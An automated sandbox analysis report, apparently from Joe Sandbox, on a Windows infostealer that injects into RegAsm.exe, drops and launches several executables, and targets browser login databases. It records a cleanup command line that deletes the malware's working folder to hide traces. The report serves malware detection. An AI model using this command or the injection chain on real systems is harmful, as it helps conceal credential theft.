Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C23A820 2_2_6C23A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004101A0 9_2_004101A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00446DCB 9_2_00446DCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00401000 9_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00407020 9_2_00407020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041508C 9_2_0041508C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004480A0 9_2_004480A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004221A0 9_2_004221A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00444240 9_2_00444240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040B270 9_2_0040B270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040C210 9_2_0040C210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00438210 9_2_00438210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004432E0 9_2_004432E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004012F2 9_2_004012F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042D295 9_2_0042D295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040937E 9_2_0040937E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00405320 9_2_00405320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004073D0 9_2_004073D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040138D 9_2_0040138D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042A3A8 9_2_0042A3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00428472 9_2_00428472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042D4D4 9_2_0042D4D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042C510 9_2_0042C510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004365E0 9_2_004365E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00401589 9_2_00401589
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00430590 9_2_00430590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00431670 9_2_00431670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042C6E1 9_2_0042C6E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004486E0 9_2_004486E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040A680 9_2_0040A680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040B700 9_2_0040B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00403780 9_2_00403780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00436820 9_2_00436820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042B830 9_2_0042B830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043F8E0 9_2_0043F8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042E927 9_2_0042E927
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042DB4B 9_2_0042DB4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00411B50 9_2_00411B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040ABD0 9_2_0040ABD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00448BE0 9_2_00448BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00447BE0 9_2_00447BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043EC60 9_2_0043EC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00407DD0 9_2_00407DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041DDFF 9_2_0041DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040CF10 9_2_0040CF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FD29F80 12_2_1FD29F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FD0AEBE 12_2_1FD0AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FD29A20 12_2_1FD29A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FD29390 12_2_1FD29390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FCE4FB2 12_2_1FCE4FB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FCC5CCF 12_2_1FCC5CCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FCC16D0 12_2_1FCC16D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FCBFD50 12_2_1FCBFD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FC99CC0 12_2_1FC99CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FC99430 12_2_1FC99430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FC9A2C0 12_2_1FC9A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FCB61E0 12_2_1FCB61E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FCBD100 12_2_1FCBD100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FCC3920 12_2_1FCC3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FC9F8D0 12_2_1FC9F8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FB44CF0 12_2_1FB44CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FB3EA80 12_2_1FB3EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FB466C0 12_2_1FB466C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FB3F160 12_2_1FB3F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FB67810 12_2_1FB67810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1FB49000 12_2_1FB49000
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\GDBFCGIIIJ.exe 0DDEBB36BEB37631DF17F68A14C90519F93BA7C200C62003527273119442E1FF
Source: Joe Sandbox View Dropped File: C:\ProgramData\IIJKJDAFHJ.exe BB28BB63ED34A3B4F97A0A26BDA8A7A7C60F961010C795007EDC52576B89E4D3
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C3309D0 appears 57 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C1494D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040EBD0 appears 171 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C13CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040CCF0 appears 51 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004104E7 appears 36 times
PE / OLE file has an invalid certificate
Source: file.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.1662150633.00000000009EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GDBFCGIIIJ.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66fbfcc9963ca_ldfsna[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KJEGDBKFIJ.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66fbfccd837ac_vadggdsa[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: IIJKJDAFHJ.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@40/58@14/14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C167030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 2_2_6C167030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 2_2_004114A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear, 2_2_00411807
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Users\userAFIDGDBGCA.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5496:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2407833622.000000006C33F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2789101065.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2775515172.000000001B738000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2407833622.000000006C33F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2789101065.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2775515172.000000001B738000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2407833622.000000006C33F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2789101065.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2775515172.000000001B738000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2407833622.000000006C33F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2789101065.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2775515172.000000001B738000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2407833622.000000006C33F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2789101065.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2775515172.000000001B738000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2407833622.000000006C33F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2789101065.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2775515172.000000001B738000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 0000000F.00000002.2789101065.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2775515172.000000001B738000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: GCGCFCBAKKFBFIECAEBA.15.dr, BGIJJK.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2789101065.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2775515172.000000001B738000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2789101065.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2775515172.000000001B738000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\GDBFCGIIIJ.exe "C:\ProgramData\GDBFCGIIIJ.exe"
Source: C:\ProgramData\GDBFCGIIIJ.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GDBFCGIIIJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\KJEGDBKFIJ.exe "C:\ProgramData\KJEGDBKFIJ.exe"
Source: C:\ProgramData\KJEGDBKFIJ.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KJEGDBKFIJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\IIJKJDAFHJ.exe "C:\ProgramData\IIJKJDAFHJ.exe"
Source: C:\ProgramData\IIJKJDAFHJ.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\IIJKJDAFHJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBGIJEHIIDGC" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBAAAAKJKJE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userBAAAAKJKJE.exe "C:\Users\userBAAAAKJKJE.exe"
Source: C:\Users\userBAAAAKJKJE.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAFIDGDBGCA.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAFIDGDBGCA.exe "C:\Users\userAFIDGDBGCA.exe"
Source: C:\Users\userAFIDGDBGCA.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userBAAAAKJKJE.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userAFIDGDBGCA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\GDBFCGIIIJ.exe "C:\ProgramData\GDBFCGIIIJ.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\KJEGDBKFIJ.exe "C:\ProgramData\KJEGDBKFIJ.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\IIJKJDAFHJ.exe "C:\ProgramData\IIJKJDAFHJ.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBGIJEHIIDGC" & exit Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
